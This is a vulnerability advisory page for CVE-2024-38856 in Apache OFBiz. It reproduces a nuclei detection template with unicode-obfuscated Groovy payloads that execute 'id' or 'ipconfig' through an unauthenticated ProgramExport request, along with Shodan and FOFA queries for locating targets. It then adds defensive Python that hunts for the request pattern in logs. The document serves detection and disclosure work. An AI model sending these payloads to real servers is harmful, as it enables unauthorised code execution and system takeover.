Apache OFBiz Incorrect Authorization - Remote Code Execution

Vulnerability Information

Vulnerability name: Apache OFBiz Incorrect Authorization - Remote Code Execution

Vulnerability ID:

  • CVE: CVE-2024-38856

Vulnerability type: Authorization bypass

Severity: Critical

Vulnerability description: Apache OFBiz is an open-source enterprise resource planning (ERP) system widely used in enterprise services, providing e-commerce, supply chain management, customer relationship management and other functions. Thanks to its flexibility and extensibility, OFBiz is adopted by many enterprises worldwide. The vulnerability lies in Apache OFBiz's authorization mechanism and manifests as an incorrect authorization flaw. An attacker can exploit it without authentication: specially crafted HTTP requests bypass the authorization checks and trigger execution of screen rendering code. The technical root cause is that screen definitions do not explicitly check the user's permissions but instead rely on the configuration of their endpoints. Because the flaw allows remote code execution, an attacker can take full control of the system, access sensitive data, and potentially cause service disruption. Exploitation requires no authentication and can be automated, so it poses a serious threat to systems running affected versions.

Vendor: Apache

Product: Apache OFBiz

Affected versions: through 18.12.14

Search query: app="Apache_OFBiz"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/ddccc8db6f1bfa7bced1074aa2ff13b42aad7af8/http%2Fcves%2F2024%2FCVE-2024-38856.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2024-38856

info:
  name: Apache OFBiz Incorrect Authorization - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).
  impact: |
    An attacker can exploit this incorrect authorization vulnerability to execute arbitrary code remotely, potentially compromising the entire system and accessing sensitive data.
  reference:
    - https://unam4.github.io/2024/08/05/CVE-2024-38856-ofbiz-12-14-filter%E7%BB%95%E8%BF%87%E5%88%B0rce/
    - https://issues.apache.org/jira/browse/OFBIZ-13128
    - https://lists.apache.org/thread/olxxjk6b13sl3wh9cmp0k2dscvp24l7w
    - https://ofbiz.apache.org/download.html
    - https://ofbiz.apache.org/security.html
  classification:
    # The template id and the classification cve-id must agree; the original
    # carried CVE-2024-32113 (the earlier OFBiz path-traversal CVE) here by mistake.
    cve-id: CVE-2024-38856
    cvss-score: 9.8
    # CWE-863 (Incorrect Authorization) is the weakness class this CVE is filed under,
    # not CWE-22 (path traversal), which belonged to the earlier OFBiz template.
    cwe-id: CWE-863
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    epss-score: 0.93490
    epss-percentile: 0.99819
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Apache_OFBiz"
    shodan-query: 'title:"OFBiz"'
    product: ofbiz
    vendor: apache
  tags: cve,cve2024,apache,ofbiz,rce,kev

http:
  - raw:
      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

      - |
        POST /webtools/control/main/ProgramExport HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0070\u0063\u006f\u006e\u0066\u0069\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

    matchers-condition: and
    matchers:
      # Either the Linux (id) or the Windows (ipconfig) command output must appear
      # in the response body, since only one of the two requests will succeed per host.
      - type: regex
        part: body
        regex:
          - 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
        condition: or

      # The payload is thrown as an exception, so its output is reflected in the
      # server's error message together with the exception class name.
      - type: word
        part: body
        words:
          - 'java.lang.Exception'

      - type: status
        status:
          - 200
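For defenders, the request pattern the template relies on is also the thing to hunt for in web-server logs: the ProgramExport view reached through a nested path under /webtools/control/ rather than directly. The Python below is an added example, not part of this page or of the nuclei-templates project. It scans constructed access-log lines for that pattern and checks whether an OFBiz version string falls in the affected range (through 18.12.14, fixed in 18.12.15, both from the template description). The template only uses `main` as the leading path segment; accepting any segment there is an assumption made here so that other unauthenticated views are caught as well.

```python
import re
from typing import NamedTuple

# Constructed sample access-log lines in Common Log Format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jul/2025:10:00:01 +0000] "GET /webtools/control/main HTTP/1.1" 200 5120
10.0.0.9 - - [31/Jul/2025:10:00:02 +0000] "POST /webtools/control/main/ProgramExport HTTP/1.1" 200 1843
10.0.0.9 - - [31/Jul/2025:10:00:03 +0000] "POST /webtools/control/main/ProgramExport HTTP/1.1" 200 2210
10.0.0.7 - - [31/Jul/2025:10:00:04 +0000] "POST /webtools/control/login HTTP/1.1" 302 0
10.0.0.7 - - [31/Jul/2025:10:00:05 +0000] "POST /webtools/control/ProgramExport HTTP/1.1" 403 512
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD path protocol", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# ProgramExport reached through one or more intermediate segments under /webtools/control/.
# A direct /webtools/control/ProgramExport request is the normal, authenticated route
# and is deliberately NOT flagged. Allowing any intermediate segment (not just "main")
# is an assumption of this example.
BYPASS_PATH_RE = re.compile(r'^/webtools/control/(?:[^/?;]+/)+ProgramExport(?:[?;].*)?$')

# Affected through 18.12.14; fixed in 18.12.15 (values from the template description).
FIXED_VERSION = (18, 12, 15)


class Hit(NamedTuple):
    ip: str
    timestamp: str
    method: str
    path: str
    status: int


def find_programexport_bypass(log_text: str) -> list[Hit]:
    """Return every request whose path matches the nested ProgramExport pattern.

    Any HTTP method is reported: the template POSTs the parameter in the body,
    but the same view could be reached with a query string. A 200 status on a
    hit means the request was actually served, which is what the template's
    status matcher keys on.
    """
    hits: list[Hit] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        if BYPASS_PATH_RE.match(m['path']):
            hits.append(Hit(m['ip'], m['ts'], m['method'], m['path'], int(m['status'])))
    return hits


def parse_version(version: str) -> tuple[int, ...]:
    """Parse the leading dotted-integer part of a version string (e.g. '18.12.14')."""
    m = re.match(r'\d+(?:\.\d+)*', version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) for p in m.group(0).split('.'))


def is_affected(version: str) -> bool:
    """True for OFBiz releases before the fixed version 18.12.15."""
    return parse_version(version) < FIXED_VERSION


if __name__ == '__main__':
    for h in find_programexport_bypass(SAMPLE_LOG):
        print(f"{h.timestamp} {h.ip} {h.method} {h.path} -> HTTP {h.status}")
    for v in ('18.12.14', '18.12.15'):
        print(f"OFBiz {v} affected: {is_affected(v)}")
```

Two hits from the same client within seconds, both served with HTTP 200, is exactly the shape the template's two-request probe leaves behind; the direct request in the last sample line is left alone because it goes through the normal authenticated route.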



http://example.com/2025/07/31/github_3846805420/
Author
lianccc
Published on
July 31, 2025